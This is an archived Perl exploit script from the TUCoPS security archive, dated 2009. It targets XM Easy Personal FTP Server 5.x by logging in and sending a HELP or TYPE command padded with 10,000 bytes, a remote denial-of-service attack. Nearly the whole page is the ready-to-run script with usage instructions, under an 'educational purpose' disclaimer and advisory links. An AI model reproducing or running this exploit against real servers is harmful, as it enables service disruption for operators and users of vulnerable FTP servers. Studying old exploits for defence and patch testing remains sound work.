TUCoPS :: HP Unsorted X :: bt-21133.htm

XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit
XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit
XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit


#!usr/bin/perl -w=0D
=0D
#######################################################################################=0D
#   XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service=0D
#   via a "HELP" or "TYPE" command with an overly long argument.=0D
#   Refer:=0D
# 												http://secunia.com/advisories/35271/=0D 
# Original advisory avaiable at:	http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/=0D 
#		 Product link:	http://www.dxm2008.com/=0D 
#=0D
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$=0D
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$=0D
#=0D
#        Author:    Vinod Sharma=0D
#        Email:     vinodsharma[underscore]mimit[at]gmail.com=0D
# Blog: http://securitygyan.com/=0D 
#        Date:      09th june, 2009=0D
#        =0D
#=0D
###Thanks all the Security Folks###=0D
########################################################################################=0D
=0D
use IO::Socket;=0D
=0D
my $server_ip=$ARGV[0];=0D
my $server_port=$ARGV[1];=0D
my $username=$ARGV[2];=0D
my $password=$ARGV[3];=0D
my $command=$ARGV[4];=0D
my $buffer=$command ." " ."\x41" x 10000 ."\r\n";          =0D
=0D
if(($#ARGV + 1)!=5)=0D
{=0D
				print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";=0D
				print "\nargument command can have a value HELP or TYPE\n";=0D
				print "\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP";=0D
				=0D
				exit;=0D
}=0D
				=0D
=0D
$socket = new IO::Socket::INET (PeerAddr  =>$server_ip,  PeerPort  => $server_port, Proto => 'tcp', )   or die "Couldn't connect to Server\n";=0D
=0D
                              =0D
while (1)=0D
{=0D
	=0D
    $socket->recv($recv_data,1024);=0D
    print "RECIEVED: $recv_data"; =0D
    =0D
	$send_data1 ="USER ".$username."\r\n";=0D
    $socket->send($send_data1);=0D
    $socket->recv($recv_data1,1024);=0D
    print "RECIEVED: $recv_data1"; =0D
	   =0D
	   $send_data2 ="PASS ".$password."\r\n";=0D
       $socket->send($send_data2);=0D
	   $socket->recv($recv_data2,1024);=0D
        print "RECIEVED: $recv_data2"; =0D
		=0D
		=0D
       $socket->send($buffer);=0D
	   print "\nAttack is send.....................\n";=0D
	   $socket->recv($recv_data3,1024);=0D
        print "RECIEVED: $recv_data3"; =0D
        =0D
		close $socket;=0D
         =0D
  }    =0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH